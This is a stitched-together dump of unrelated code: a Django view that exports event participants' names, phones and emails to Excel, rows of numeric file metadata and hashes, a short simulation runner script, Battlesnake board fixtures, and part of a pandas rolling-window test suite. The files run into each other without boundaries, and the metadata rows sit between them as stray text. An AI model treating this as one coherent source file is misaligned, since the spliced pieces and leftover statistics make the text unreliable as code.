    worksheet.write(1, 6, "Email")
    worksheet.write(1, 7, "Description")
    worksheet.write(1, 8, "Root Mail")
    worksheet.write(1, 9, "PCR Approved")
    # Data rows start at row 2; deepgetattr falls back to 'NA' when an
    # attribute (or dotted sub-attribute) is missing.
    for i, ca in enumerate(entries):
        """for each object in the date list, attribute1 & attribute2
        are written to the first & second column respectively,
        for the relevant row. The 3rd arg is a failure message if
        there is no data available"""
        worksheet.write(i+2, 0, deepgetattr(ca, 'id', 'NA'))
        worksheet.write(i+2, 1, deepgetattr(ca, 'name', 'NA'))
        worksheet.write(i+2, 2, deepgetattr(ca, 'college.name', 'NA'))
        worksheet.write(i+2, 3, deepgetattr(ca, 'degree', 'NA'))
        worksheet.write(i+2, 4, deepgetattr(ca, 'year', 'NA'))
        worksheet.write(i+2, 5, deepgetattr(ca, 'phone', 'NA'))
        worksheet.write(i+2, 6, deepgetattr(ca, 'email', 'NA'))
        worksheet.write(i+2, 7, deepgetattr(ca, 'ambassador_quality', 'NA'))
        worksheet.write(i+2, 8, deepgetattr(ca, 'root_mail', 'NA'))
        worksheet.write(i+2, 9, deepgetattr(ca, 'pcr_approved', 'NA'))
    workbook.close()
    filename = 'ExcelReport.xlsx'
    output.seek(0)
    response = HttpResponse(output.read(), content_type="application/ms-excel")
    response['Content-Disposition'] = 'attachment; filename=%s' % filename
    return response
def _event_participants_xlsx_response(event_name):
    """Build an xlsx download of all Participants registered for *event_name*.

    Shared backend for dhiti_xlsx / RENG_xlsx / innover_xlsx, which were
    three byte-for-byte copies of the same body differing only in the event
    name. Row 0 holds a generated-at timestamp, row 1 the headers, then one
    row per participant ordered by id. Returns an HttpResponse serving the
    workbook as an 'application/ms-excel' attachment named ExcelReport.xlsx.
    """
    # NOTE(review): `Event` is not imported at module scope in this file —
    # confirm which models module provides it (latent NameError otherwise).
    event = Event.objects.filter(name=event_name)
    entries = Participant.objects.filter(events__in=event)
    # Sort by primary key so rows come out in a stable order.
    data = sorted(({'obj': p} for p in entries), key=lambda k: k['obj'].id)
    output = StringIO.StringIO()
    workbook = xlsxwriter.Workbook(output)
    worksheet = workbook.add_worksheet('new-spreadsheet')
    # Kept for parity with the original code; the format is never applied.
    date_format = workbook.add_format({'num_format': 'mmmm d yyyy'})
    worksheet.write(0, 0, "Generated:")
    # gmtime/strftime are imported at module level; the originals re-imported
    # them locally in every function, which was redundant.
    generated = strftime("%d-%m-%Y %H:%M:%S UTC", gmtime())
    worksheet.write(0, 1, generated)
    headers = ["ID", "Name", "College", "city", "phone_one", "Email",
               "Email Verified", "Pcr Approval", "Fee Paid"]
    for col, title in enumerate(headers):
        worksheet.write(1, col, title)
    # Attribute paths read off each participant; deepgetattr writes 'NA'
    # when an attribute (or dotted sub-attribute) is missing.
    attrs = ['id', 'name', 'college.name', 'city', 'phone_one', 'email_id',
             'email_verified', 'pcr_approval', 'fee_paid']
    for i, row in enumerate(data):
        for col, attr in enumerate(attrs):
            worksheet.write(i + 2, col, deepgetattr(row['obj'], attr, 'NA'))
    workbook.close()
    filename = 'ExcelReport.xlsx'
    output.seek(0)
    response = HttpResponse(output.read(), content_type="application/ms-excel")
    response['Content-Disposition'] = 'attachment; filename=%s' % filename
    return response
def dhiti_xlsx(request):
    """Excel export of participants registered for the 'Dhiti' event."""
    return _event_participants_xlsx_response('Dhiti')
def RENG_xlsx(request):
    """Excel export of participants for the 'Reverse Engineering' event."""
    return _event_participants_xlsx_response('Reverse Engineering')
def innover_xlsx(request):
    """Excel export of participants registered for the 'Innover' event."""
    return _event_participants_xlsx_response('Innover')
def participant_excel(request):
    """Excel export of every Participant with no assigned MSP.

    Writes Name/Gender/phone/email/college headers in row 0 and one data row
    per participant. Returns the workbook as an 'application/ms-excel'
    attachment named part_apogee.xlsx.

    Fixes vs. original: removed the unused locals `a_list` and `colno`, and
    replaced the manually-incremented row counter with enumerate().
    """
    output = StringIO.StringIO()
    workbook = xlsxwriter.Workbook(output)
    worksheet = workbook.add_worksheet('part_apogee')
    plist = Participant.objects.filter(msp=None)
    for col, title in enumerate(["Name", "Gender", "phone", "email", "college"]):
        worksheet.write(0, col, title)
    # Data rows start at row 1, immediately under the header.
    for rowno, x in enumerate(plist, start=1):
        worksheet.write(rowno, 0, x.name)
        worksheet.write(rowno, 1, x.gender)
        worksheet.write(rowno, 2, x.phone)
        worksheet.write(rowno, 3, x.email)
        worksheet.write(rowno, 4, x.college.name)
    workbook.close()
    filename = 'part_apogee.xlsx'
    output.seek(0)
    response = HttpResponse(output.read(), content_type="application/ms-excel")
    response['Content-Disposition'] = 'attachment; filename=%s' % filename
    return response
| 35.393822
| 83
| 0.696956
| 1,331
| 9,167
| 4.746807
| 0.117956
| 0.203862
| 0.087844
| 0.093701
| 0.832225
| 0.821621
| 0.821621
| 0.797879
| 0.787433
| 0.760525
| 0
| 0.024869
| 0.127086
| 9,167
| 258
| 84
| 35.531008
| 0.764684
| 0.0132
| 0
| 0.720207
| 0
| 0
| 0.177653
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025907
| false
| 0
| 0.062176
| 0
| 0.11399
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2ef02c3e4efc237f53dec0244006fe447fa7dd5
| 182
|
py
|
Python
|
exec/resources/simple_run.py
|
Fladdimir/casymda
|
6cf599bed2229c4aff9bca31350604b38ef76138
|
[
"MIT"
] | 19
|
2020-04-18T14:47:37.000Z
|
2022-03-26T14:18:21.000Z
|
exec/resources/simple_run.py
|
Fladdimir/casymda
|
6cf599bed2229c4aff9bca31350604b38ef76138
|
[
"MIT"
] | 4
|
2020-03-17T21:01:58.000Z
|
2021-09-24T21:07:25.000Z
|
exec/resources/simple_run.py
|
Fladdimir/casymda
|
6cf599bed2229c4aff9bca31350604b38ef76138
|
[
"MIT"
] | 4
|
2020-05-09T16:31:57.000Z
|
2022-01-23T09:11:19.000Z
|
import sys
# Make the repository root importable when this file is run as a script
# (expects the working directory to be the project root).
sys.path.append(".")
from examples.resources import simple_run_resource_example_test
if __name__ == "__main__":
    # Run the resource example's test function directly, outside pytest.
    simple_run_resource_example_test.test_simple_run()
| 18.2
| 63
| 0.802198
| 25
| 182
| 5.12
| 0.6
| 0.210938
| 0.265625
| 0.375
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10989
| 182
| 9
| 64
| 20.222222
| 0.790123
| 0
| 0
| 0
| 0
| 0
| 0.049451
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
0c33579592df7402301b13a7573b50686359c0b7
| 16,815
|
py
|
Python
|
app/Python-Snake/Python-Snake/test_data.py
|
Simobergius/starter-snake-python
|
d9ad718c78389125be679938fa362d73b19a1084
|
[
"MIT"
] | null | null | null |
app/Python-Snake/Python-Snake/test_data.py
|
Simobergius/starter-snake-python
|
d9ad718c78389125be679938fa362d73b19a1084
|
[
"MIT"
] | null | null | null |
app/Python-Snake/Python-Snake/test_data.py
|
Simobergius/starter-snake-python
|
d9ad718c78389125be679938fa362d73b19a1084
|
[
"MIT"
] | null | null | null |
# Battlesnake-style move-request fixture: a 10x10 board holding one
# 10-segment snake ('testsnake', health 100) and a single food at (2, 2).
# NOTE(review): the 'you' body repeats the board snake's coordinates but the
# tail run differs (y=6 here vs y=4 under board.snakes) — possibly a
# deliberate test discrepancy; confirm against the consuming tests.
data1 = {
    'board': {
        'snakes': [
            {'body': [
                {'x': 5, 'y': 5},
                {'x': 5, 'y': 6},
                {'x': 4, 'y': 6},
                {'x': 3, 'y': 6},
                {'x': 3, 'y': 5},
                {'x': 3, 'y': 4},
                {'x': 4, 'y': 4},
                {'x': 5, 'y': 4},
                {'x': 6, 'y': 4},
                {'x': 7, 'y': 4}
            ],
                'health': 100,
                'id': 'testsnake',
                'length': 10,
                'name': 'testsnake',
                'object': 'snake'
            }
        ],
        'height': 10,
        'width': 10,
        'food': [
            {'x': 2, 'y': 2},
        ]
    },
    'you': {
        'body': [
            {'x': 5, 'y': 5},
            {'x': 5, 'y': 6},
            {'x': 4, 'y': 6},
            {'x': 3, 'y': 6},
            {'x': 3, 'y': 5},
            {'x': 3, 'y': 4},
            {'x': 4, 'y': 6},
            {'x': 5, 'y': 6},
            {'x': 6, 'y': 6},
            {'x': 7, 'y': 6}
        ],
        'health': 100,
        'id': 'testsnake',
        'length': 10,
        'name': 'testsnake',
        'object': 'snake'
    }
}
data2 = {
'board': {
'snakes': [
{'body': [
{'x': 5, 'y': 5},
{'x': 5, 'y': 6},
{'x': 5, 'y': 7},
{'x': 4, 'y': 7},
{'x': 3, 'y': 7},
{'x': 2, 'y': 7},
{'x': 2, 'y': 6},
{'x': 2, 'y': 5},
{'x': 2, 'y': 4},
{'x': 3, 'y': 4},
{'x': 4, 'y': 4},
{'x': 5, 'y': 4},
{'x': 6, 'y': 4},
{'x': 7, 'y': 4}
],
'health': 100,
'id': 'testsnake',
'length': 14,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 2, 'y': 2},
]
},
'you': {
'body': [
{'x': 5, 'y': 5},
{'x': 5, 'y': 6},
{'x': 5, 'y': 7},
{'x': 4, 'y': 7},
{'x': 3, 'y': 7},
{'x': 2, 'y': 7},
{'x': 2, 'y': 6},
{'x': 2, 'y': 5},
{'x': 2, 'y': 4},
{'x': 3, 'y': 4},
{'x': 4, 'y': 4},
{'x': 5, 'y': 4},
{'x': 6, 'y': 4},
{'x': 7, 'y': 4}
],
'health': 100,
'id': 'testsnake',
'length': 14,
'name': 'testsnake',
'object': 'snake'
}
}
data3 = {
'board': {
'snakes': [
{'body': [
{'x': 0, 'y': 1},
{'x': 1, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 2,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 5, 'y': 5},
]
},
'you': {
'body': [
{'x': 0, 'y': 1},
{'x': 1, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 2,
'name': 'testsnake',
'object': 'snake'
}
}
data4 = {
'board': {
'snakes': [
{'body': [
{'x': 2, 'y': 0},
{'x': 1, 'y': 0},
{'x': 0, 'y': 0},
{'x': 0, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 4,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 1, 'y': 1},
]
},
'you': {
'body': [
{'x': 2, 'y': 0},
{'x': 1, 'y': 0},
{'x': 0, 'y': 0},
{'x': 0, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 4,
'name': 'testsnake',
'object': 'snake'
}
}
data5 = {
'board': {
'snakes': [
{'body': [
{'x': 3, 'y': 0},
{'x': 3, 'y': 0},
{'x': 3, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 1, 'y': 1},
]
},
'you': {
'body': [
{'x': 3, 'y': 0},
{'x': 3, 'y': 0},
{'x': 3, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
}
def _snake_request(body, height, width, food):
    """Build a Battlesnake-style move-request dict for a single test snake.

    body   -- sequence of (x, y) tuples, head first
    height -- board height
    width  -- board width
    food   -- sequence of (x, y) food positions

    The returned dict mirrors the literal fixtures it replaces: the same
    snake appears once under board['snakes'] and once under 'you', as two
    independent dict objects (so mutating one cannot affect the other).
    """
    def make_snake():
        # Fresh dicts on every call: board snake and 'you' must not alias.
        return {
            'body': [{'x': x, 'y': y} for x, y in body],
            'health': 100,
            'id': 'testsnake',
            'length': len(body),
            'name': 'testsnake',
            'object': 'snake',
        }
    return {
        'board': {
            'snakes': [make_snake()],
            'height': height,
            'width': width,
            'food': [{'x': x, 'y': y} for x, y in food],
        },
        'you': make_snake(),
    }


# Length-3 snake stacked on a single cell (start-of-game state), 10x10 board.
data52 = _snake_request([(0, 3)] * 3, 10, 10, [(1, 1)])
data53 = _snake_request([(3, 9)] * 3, 10, 10, [(1, 1)])
data54 = _snake_request([(9, 3)] * 3, 10, 10, [(1, 1)])

# Length-7 snake hugging the left wall, 10x10 board.
data6 = _snake_request(
    [(0, 7), (0, 8), (1, 8), (1, 7), (1, 6), (1, 5), (1, 4)],
    10, 10, [(5, 8)])

# Length-13 coiled snake, 10x10 board.
data7 = _snake_request(
    [(4, 2), (4, 1), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5), (4, 5),
     (3, 5), (3, 4), (3, 3), (2, 3), (1, 3)],
    10, 10, [(5, 8)])

# Length-34 snake with a long vertical run down column x=6, 30x30 board.
data8 = _snake_request(
    [(8, 29), (8, 28), (7, 28)]
    + [(6, y) for y in range(27, 0, -1)]
    + [(7, 1), (8, 1), (9, 1), (9, 2)],
    30, 30, [(5, 8)])

# Length-13 snake coiled near the bottom-left corner, 10x10 board.
data9 = _snake_request(
    [(4, 2), (4, 3), (4, 4), (3, 4), (2, 4), (1, 4), (1, 3), (1, 2),
     (1, 1), (2, 1), (3, 1), (3, 0), (2, 0)],
    10, 10, [(2, 6)])

# Length-36 snake forming a dead end that is only escapable via the tail,
# 12x12 board.
data_dead_end_with_tail = _snake_request(
    [(6, 0), (6, 1), (6, 2), (6, 3), (5, 3), (4, 3), (4, 4), (4, 5),
     (3, 5), (2, 5), (1, 5), (1, 4), (1, 3), (0, 3), (0, 4), (0, 5),
     (0, 6), (1, 6), (2, 6), (3, 6), (4, 6), (5, 6), (6, 6), (7, 6),
     (7, 5), (7, 4), (7, 3), (7, 2), (7, 1), (8, 1), (8, 2), (9, 2),
     (10, 2), (10, 1), (10, 0), (11, 0)],
    12, 12, [(8, 8)])
| 25.134529
| 35
| 0.191436
| 1,619
| 16,815
| 1.985794
| 0.041384
| 0.042302
| 0.063453
| 0.161742
| 0.952722
| 0.946501
| 0.929393
| 0.929393
| 0.925972
| 0.925039
| 0
| 0.112106
| 0.554921
| 16,815
| 669
| 36
| 25.134529
| 0.317477
| 0
| 0
| 0.87156
| 0
| 0
| 0.137318
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
0c564c18fb4a5f2edf665bb4e687ef1652ddd63f
| 46,787
|
py
|
Python
|
sdc/tests/test_rolling.py
|
samir-nasibli/sdc
|
b9144c8799d6454dec3e5c550e305963b24c1570
|
[
"BSD-2-Clause"
] | null | null | null |
sdc/tests/test_rolling.py
|
samir-nasibli/sdc
|
b9144c8799d6454dec3e5c550e305963b24c1570
|
[
"BSD-2-Clause"
] | null | null | null |
sdc/tests/test_rolling.py
|
samir-nasibli/sdc
|
b9144c8799d6454dec3e5c550e305963b24c1570
|
[
"BSD-2-Clause"
] | null | null | null |
# *****************************************************************************
# Copyright (c) 2019, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
import unittest
import itertools
import os
import pandas as pd
import platform
import numpy as np
import numba
import sdc
from itertools import product
from numba.errors import TypingError
from sdc.tests.test_base import TestCase
from sdc.tests.test_utils import (count_array_REPs, count_parfor_REPs,
count_parfor_OneDs, count_array_OneDs, dist_IR_contains,
skip_numba_jit, skip_sdc_jit,
test_global_input_data_float64)
from sdc.hiframes.rolling import supported_rolling_funcs
# Run the extended rolling-test matrix only when the environment variable
# SDC_LONG_ROLLING_TEST is set to a non-zero integer; otherwise keep the
# short default matrix.
LONG_TEST = (int(os.environ['SDC_LONG_ROLLING_TEST']) != 0
             if 'SDC_LONG_ROLLING_TEST' in os.environ else False)
# Rolling functions exercised by the generic df/series tests below.
test_funcs = ('mean', 'max',)
if LONG_TEST:
    # all functions except apply, cov, corr
    test_funcs = supported_rolling_funcs[:-3]
def series_rolling_std_usecase(series, window, min_periods, ddof):
    """Return the rolling standard deviation of *series* with the given
    window, min_periods and delta degrees of freedom."""
    roller = series.rolling(window, min_periods)
    return roller.std(ddof)
def series_rolling_var_usecase(series, window, min_periods, ddof):
    """Return the rolling variance of *series* with the given window,
    min_periods and delta degrees of freedom."""
    roller = series.rolling(window, min_periods)
    return roller.var(ddof)
class TestRolling(TestCase):
    @skip_numba_jit
    def test_fixed1(self):
        """Compare jitted df.rolling(w, center=c).<func>() with pandas on
        two small hand-written DataFrames, for every func in test_funcs."""
        # test sequentially with manually created dfs
        wins = (3,)
        if LONG_TEST:
            wins = (2, 3, 5)
        centers = (False, True)
        for func_name in test_funcs:
            # build the test function per rolling method via exec
            func_text = "def test_impl(df, w, c):\n return df.rolling(w, center=c).{}()\n".format(func_name)
            loc_vars = {}
            exec(func_text, {}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            for args in itertools.product(wins, centers):
                df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
                pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
                df = pd.DataFrame({'B': [0, 1, 2, -2, 4]})
                pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
    @skip_numba_jit
    def test_fixed2(self):
        """Compare jitted df.rolling(w, center=c).<func>() with pandas on
        generated DataFrames of several sizes."""
        # test sequentially with generated dfs
        sizes = (121,)
        wins = (3,)
        if LONG_TEST:
            sizes = (1, 2, 10, 11, 121, 1000)
            wins = (2, 3, 5)
        centers = (False, True)
        for func_name in test_funcs:
            # build the test function per rolling method via exec
            func_text = "def test_impl(df, w, c):\n return df.rolling(w, center=c).{}()\n".format(func_name)
            loc_vars = {}
            exec(func_text, {}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            for n, w, c in itertools.product(sizes, wins, centers):
                df = pd.DataFrame({'B': np.arange(n)})
                pd.testing.assert_frame_equal(hpat_func(df, w, c), test_impl(df, w, c))
    @skip_numba_jit
    def test_fixed_apply1(self):
        """Compare jitted rolling.apply(sum) with pandas on two small
        hand-written DataFrames."""
        # test sequentially with manually created dfs
        def test_impl(df, w, c):
            return df.rolling(w, center=c).apply(lambda a: a.sum())
        hpat_func = self.jit(test_impl)
        wins = (3,)
        if LONG_TEST:
            wins = (2, 3, 5)
        centers = (False, True)
        for args in itertools.product(wins, centers):
            df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
            pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
            df = pd.DataFrame({'B': [0, 1, 2, -2, 4]})
            pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
    @skip_numba_jit
    def test_fixed_apply2(self):
        """Compare jitted rolling.apply(sum) with pandas on generated
        DataFrames of several sizes."""
        # test sequentially with generated dfs
        def test_impl(df, w, c):
            return df.rolling(w, center=c).apply(lambda a: a.sum())
        hpat_func = self.jit(test_impl)
        sizes = (121,)
        wins = (3,)
        if LONG_TEST:
            sizes = (1, 2, 10, 11, 121, 1000)
            wins = (2, 3, 5)
        centers = (False, True)
        for n, w, c in itertools.product(sizes, wins, centers):
            df = pd.DataFrame({'B': np.arange(n)})
            pd.testing.assert_frame_equal(hpat_func(df, w, c), test_impl(df, w, c))
    @skip_numba_jit
    def test_fixed_parallel1(self):
        """Check parallel fixed-window rolling sum: results match pandas and
        no array/parfor is REPlicated (i.e. the run stays distributed)."""
        def test_impl(n, w, center):
            df = pd.DataFrame({'B': np.arange(n)})
            R = df.rolling(w, center=center).sum()
            return R.B.sum()
        hpat_func = self.jit(test_impl)
        sizes = (121,)
        wins = (5,)
        if LONG_TEST:
            sizes = (1, 2, 10, 11, 121, 1000)
            wins = (2, 4, 5, 10, 11)
        centers = (False, True)
        for args in itertools.product(sizes, wins, centers):
            self.assertEqual(hpat_func(*args), test_impl(*args),
                             "rolling fixed window with {}".format(args))
        # zero REP counts mean everything was parallelized
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
    @skip_numba_jit
    def test_fixed_parallel_apply1(self):
        """Check parallel fixed-window rolling.apply(sum): results match
        pandas and the run stays distributed (no REPlicated arrays)."""
        def test_impl(n, w, center):
            df = pd.DataFrame({'B': np.arange(n)})
            R = df.rolling(w, center=center).apply(lambda a: a.sum())
            return R.B.sum()
        hpat_func = self.jit(test_impl)
        sizes = (121,)
        wins = (5,)
        if LONG_TEST:
            sizes = (1, 2, 10, 11, 121, 1000)
            wins = (2, 4, 5, 10, 11)
        centers = (False, True)
        for args in itertools.product(sizes, wins, centers):
            self.assertEqual(hpat_func(*args), test_impl(*args),
                             "rolling fixed window with {}".format(args))
        # zero REP counts mean everything was parallelized
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
    @skip_numba_jit
    def test_variable1(self):
        """Compare jitted time-based (variable window) rolling aggregations
        with pandas on two small hand-written DataFrames."""
        # test sequentially with manually created dfs
        df1 = pd.DataFrame({'B': [0, 1, 2, np.nan, 4],
                            'time': [pd.Timestamp('20130101 09:00:00'),
                                     pd.Timestamp('20130101 09:00:02'),
                                     pd.Timestamp('20130101 09:00:03'),
                                     pd.Timestamp('20130101 09:00:05'),
                                     pd.Timestamp('20130101 09:00:06')]})
        df2 = pd.DataFrame({'B': [0, 1, 2, -2, 4],
                            'time': [pd.Timestamp('20130101 09:00:01'),
                                     pd.Timestamp('20130101 09:00:02'),
                                     pd.Timestamp('20130101 09:00:03'),
                                     pd.Timestamp('20130101 09:00:04'),
                                     pd.Timestamp('20130101 09:00:09')]})
        wins = ('2s',)
        if LONG_TEST:
            wins = ('1s', '2s', '3s', '4s')
        # all functions except apply
        for w, func_name in itertools.product(wins, test_funcs):
            func_text = "def test_impl(df):\n return df.rolling('{}', on='time').{}()\n".format(w, func_name)
            loc_vars = {}
            exec(func_text, {}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            # XXX: skipping min/max for this test since the behavior of Pandas
            # is inconsistent: it assigns NaN to last output instead of 4!
            if func_name not in ('min', 'max'):
                pd.testing.assert_frame_equal(hpat_func(df1), test_impl(df1))
            pd.testing.assert_frame_equal(hpat_func(df2), test_impl(df2))
    @skip_numba_jit
    def test_variable2(self):
        """Compare jitted time-based (variable window) rolling aggregations
        with pandas on generated DataFrames with a per-second time index."""
        # test sequentially with generated dfs
        wins = ('2s',)
        sizes = (121,)
        if LONG_TEST:
            wins = ('1s', '2s', '3s', '4s')
            sizes = (1, 2, 10, 11, 121, 1000)
        # all functions except apply
        for w, func_name in itertools.product(wins, test_funcs):
            func_text = "def test_impl(df):\n return df.rolling('{}', on='time').{}()\n".format(w, func_name)
            loc_vars = {}
            exec(func_text, {}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            for n in sizes:
                time = pd.date_range(start='1/1/2018', periods=n, freq='s')
                df = pd.DataFrame({'B': np.arange(n), 'time': time})
                pd.testing.assert_frame_equal(hpat_func(df), test_impl(df))
    @skip_numba_jit
    def test_variable_apply1(self):
        """Compare jitted time-based rolling.apply(sum) with pandas on two
        small hand-written DataFrames."""
        # test sequentially with manually created dfs
        df1 = pd.DataFrame({'B': [0, 1, 2, np.nan, 4],
                            'time': [pd.Timestamp('20130101 09:00:00'),
                                     pd.Timestamp('20130101 09:00:02'),
                                     pd.Timestamp('20130101 09:00:03'),
                                     pd.Timestamp('20130101 09:00:05'),
                                     pd.Timestamp('20130101 09:00:06')]})
        df2 = pd.DataFrame({'B': [0, 1, 2, -2, 4],
                            'time': [pd.Timestamp('20130101 09:00:01'),
                                     pd.Timestamp('20130101 09:00:02'),
                                     pd.Timestamp('20130101 09:00:03'),
                                     pd.Timestamp('20130101 09:00:04'),
                                     pd.Timestamp('20130101 09:00:09')]})
        wins = ('2s',)
        if LONG_TEST:
            wins = ('1s', '2s', '3s', '4s')
        # rolling apply with a sum over each variable window
        for w in wins:
            func_text = "def test_impl(df):\n return df.rolling('{}', on='time').apply(lambda a: a.sum())\n".format(w)
            loc_vars = {}
            exec(func_text, {}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            pd.testing.assert_frame_equal(hpat_func(df1), test_impl(df1))
            pd.testing.assert_frame_equal(hpat_func(df2), test_impl(df2))
    @skip_numba_jit
    def test_variable_apply2(self):
        """Compare jitted time-based rolling.apply(sum) with pandas on
        generated DataFrames with a per-second time index."""
        # test sequentially with generated dfs
        wins = ('2s',)
        sizes = (121,)
        if LONG_TEST:
            wins = ('1s', '2s', '3s', '4s')
            # TODO: this crashes on Travis (3 process config) with size 1
            sizes = (2, 10, 11, 121, 1000)
        # rolling apply with a sum over each variable window
        for w in wins:
            func_text = "def test_impl(df):\n return df.rolling('{}', on='time').apply(lambda a: a.sum())\n".format(w)
            loc_vars = {}
            exec(func_text, {}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            for n in sizes:
                time = pd.date_range(start='1/1/2018', periods=n, freq='s')
                df = pd.DataFrame({'B': np.arange(n), 'time': time})
                pd.testing.assert_frame_equal(hpat_func(df), test_impl(df))
    @skip_numba_jit
    @unittest.skipIf(platform.system() == 'Windows', "ValueError: time must be monotonic")
    def test_variable_parallel1(self):
        """Check parallel time-based rolling aggregations: results match
        pandas and the run stays distributed (no REPlicated arrays)."""
        wins = ('2s',)
        sizes = (121,)
        if LONG_TEST:
            wins = ('1s', '2s', '3s', '4s')
            # XXX: Pandas returns time = [np.nan] for size==1 for some reason
            sizes = (2, 10, 11, 121, 1000)
        # all functions except apply
        for w, func_name in itertools.product(wins, test_funcs):
            func_text = "def test_impl(n):\n"
            func_text += " df = pd.DataFrame({'B': np.arange(n), 'time': "
            func_text += " pd.DatetimeIndex(np.arange(n) * 1000000000)})\n"
            func_text += " res = df.rolling('{}', on='time').{}()\n".format(w, func_name)
            func_text += " return res.B.sum()\n"
            loc_vars = {}
            exec(func_text, {'pd': pd, 'np': np}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            for n in sizes:
                np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        # zero REP counts mean everything was parallelized
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
    @skip_numba_jit
    @unittest.skipIf(platform.system() == 'Windows', "ValueError: time must be monotonic")
    def test_variable_apply_parallel1(self):
        """Check parallel time-based rolling.apply(sum): results match
        pandas and the run stays distributed (no REPlicated arrays)."""
        wins = ('2s',)
        sizes = (121,)
        if LONG_TEST:
            wins = ('1s', '2s', '3s', '4s')
            # XXX: Pandas returns time = [np.nan] for size==1 for some reason
            sizes = (2, 10, 11, 121, 1000)
        # rolling apply with a sum over each variable window
        for w in wins:
            func_text = "def test_impl(n):\n"
            func_text += " df = pd.DataFrame({'B': np.arange(n), 'time': "
            func_text += " pd.DatetimeIndex(np.arange(n) * 1000000000)})\n"
            func_text += " res = df.rolling('{}', on='time').apply(lambda a: a.sum())\n".format(w)
            func_text += " return res.B.sum()\n"
            loc_vars = {}
            exec(func_text, {'pd': pd, 'np': np}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            for n in sizes:
                np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        # zero REP counts mean everything was parallelized
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
    @skip_numba_jit
    def test_series_fixed1(self):
        """Compare jitted Series.rolling(w, center=c).<func>() and
        rolling.apply(sum) with pandas on two small Series."""
        # test series rolling functions
